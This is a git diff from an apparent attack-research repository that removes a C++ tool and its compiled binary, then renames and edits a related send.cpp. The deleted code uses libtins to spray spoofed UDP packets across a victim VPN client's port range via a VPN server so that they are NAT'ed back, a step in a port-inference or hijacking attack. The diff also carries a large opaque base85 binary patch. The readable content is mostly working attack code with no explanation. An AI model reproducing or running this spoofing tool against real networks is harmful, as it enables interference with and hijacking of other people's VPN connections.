distribution(0, CHARACTERS.size() - 1); - - string random_string; - - for (std::size_t i = 0; i < length; ++i) { - random_string += CHARACTERS[distribution(generator)]; - } - - return random_string; -} - - - -// Spreads UDPs across the victim's entire port range -// to find a port that is being used and the spoofed packets -// get NAT'ed back to the client -// -int spread_uds(bool server_spread, string server_ip, int server_port, string dest_ip, int start_port, int end_port) { - - PacketSender sender; - NetworkInterface iface("enp0s9"); - int i; - IP pkt; - - if (server_spread) pkt = IP(dest_ip, server_ip) / UDP(start_port, server_port); - else pkt = IP(server_ip, dest_ip) / UDP(server_port, start_port); - - UDP& udp = pkt.rfind_pdu(); - int spoof_port = start_port; - - int send_size = 0; - int send_count = 0; - string send_payload = random_string(send_size); - - - - cout << "spreading the port range from " << spoof_port << " to " << end_port << " with udps..\n"; - - - while (spoof_port < end_port) { - - if (server_spread) udp.dport(spoof_port); // set the packets src port to current guess - else udp.sport(spoof_port); - sender.send(pkt, iface); - spoof_port++; - send_size ++; - send_payload = random_string(send_size); - //cout << "next rando string: " << send_payload << "\n"; - - // if the payload size reaches 1000 (max), reset back to 0 - if (send_size >= 1000) { - send_size = 0; - cout << "Sent w size 1000 to " << spoof_port << "\n"; - } - - usleep(1); - } - - if (verbose) print_divider(2); - - return 1; - -} - - -int fill_ports(bool server_spread, string source_ip, int sport, string dest_ip, int start_port, int end_port) { - - bool filling = true; - int current_port = 0; - - while (filling) { - - current_port = spread_uds(server_spread, source_ip, sport, dest_ip, start_port, end_port); - print_divider(1); - - if (verbose) cout << "finished phase 2 w possible port: " << current_port << "\n"; - - count_resp = true; - filling = false; - print_divider(2); - - } - - return current_port; - -} - - - - -int main(int argc, char** argv) { - - cout << "arc twas: " << argc; - - if (argc != 6 && argc != 7) { - cout << "sike wrong number of args ---> (server_ip, server_port, dest_ip, start_port, end_port )\n"; - return 0; - } - - server_ip = argv[1]; // dns server IP - int server_port = atoi(argv[2]); - dest_ip = argv[3]; // vpn server IP - int start_port = atoi(argv[4]); - int end_port = atoi(argv[5]); - bool server_spread = false; - - if (argc == 7) server_spread = true; - - verbose = true; - - string dest_mac = ""; - string src_mac = ""; - - print_divider(2); - - - int p = fill_ports(server_spread, server_ip, server_port, dest_ip, start_port, end_port); - - cout << p << "\n"; - print_divider(1); - is_running = false; - - if (verbose) cout << "Filled up all those ports and finished at: " << p << "\n"; - - return p; -} diff --git a/server-side-attack/dns-sside/phases/udder_fillup/uud_send b/server-side-attack/dns-sside/phases/udder_fillup/uud_send deleted file mode 100755 index 5a4725968564de2c9c19dac90d68cb48e05e9730..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 43736 zcmeHweOz3{x&K*U6HFp(V&cW9%^Ek6_=3AY2&kz`V3V_vBnTvpZ#^uqgf+mf`vOF* zl0r0FM7f%4qt)KDz50u_^``YLMoWlM5^Zf!tIe&p;%m=}RjhBR*6{m2b7pqW9(J|b z`|)%CaQG~9o@btU=9y=nd1lU>GiR=LRV~jjnIsW1q;Ey^DDA%_9r`f?Ij&SX zN^(k8=|pJ?FlPLmEQMn2O2mgbYY}I2x=h4b_?2d8h|&xvyAbgS8d?&ukdR_3FA<#l zQj0C$)<6+UkdgxBBUul&5kzr)QtT#S5Oxazc|H=4@~J$Z%JYfX!sQpS$WH9&SI5)q zGMs=2c2Xo&vj2&g7cW)69&V!R`n4KC{aPox5b+6A5d;y7eCHz{$@$L)3n#4M<)zb0 zqJ6Xsym;x%R$oI&@tLhnXSDj-BVA{7m6n`QQd|)77ZkF36Mv#zv0AH$(4!SNl6f|M zWCN6b;X3bAe?RWPf1G&a!}oXWtF?c6=7PU3K-$^(5iRNTu9jb#W|)r3-hI!)qv|s= zHd|ji;TO{~rn#3rJ>z84lo}J!eiOfP{6wh0g$uvs_^rTiC4TyF9tTz-UX9=Ry2Kh> z*Wy=)AJt$Teiz^;!o|3_1iyOxJoq)@Cqff0y!egY^30ywZdkJ5mg_S%<}_Z>SaDdw9*_XU~3b@DFpg�I` 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 diff --git a/server-side-attack/tcp-sside/Makefile b/server-side-attack/tcp-sside/conn_inf/Makefile similarity index 100% rename from server-side-attack/tcp-sside/Makefile rename to server-side-attack/tcp-sside/conn_inf/Makefile diff --git a/server-side-attack/tcp-sside/send.cpp b/server-side-attack/tcp-sside/conn_inf/send.cpp similarity index 75% rename from server-side-attack/tcp-sside/send.cpp rename to server-side-attack/tcp-sside/conn_inf/send.cpp index a33b551..2ab1ce5 100644 --- a/server-side-attack/tcp-sside/send.cpp +++ b/server-side-attack/tcp-sside/conn_inf/send.cpp @@ -16,7 +16,7 @@ using namespace Tins; int current_spoof_port, best_port, chack_count; bool is_running = true; bool verbose = false; - +bool rechecking = true; // rechecks inferred port if true bool sniffed_resp = false; string dest_ip; @@ -32,29 +32,15 @@ void print_divider(int count) { } } -bool handle_send_packet(PDU &some_pdu) { - - const IP &ip = some_pdu.rfind_pdu(); // Grab IP layer of sniffed packet - - if (ip.src_addr() == source_ip) { - current_spoof_port = some_pdu.rfind_pdu().dport(); - //cout << "Current Spoof Port (sniff) = " << current_spoof_port << "\n"; - } - if (ip.src_addr() == dest_ip) 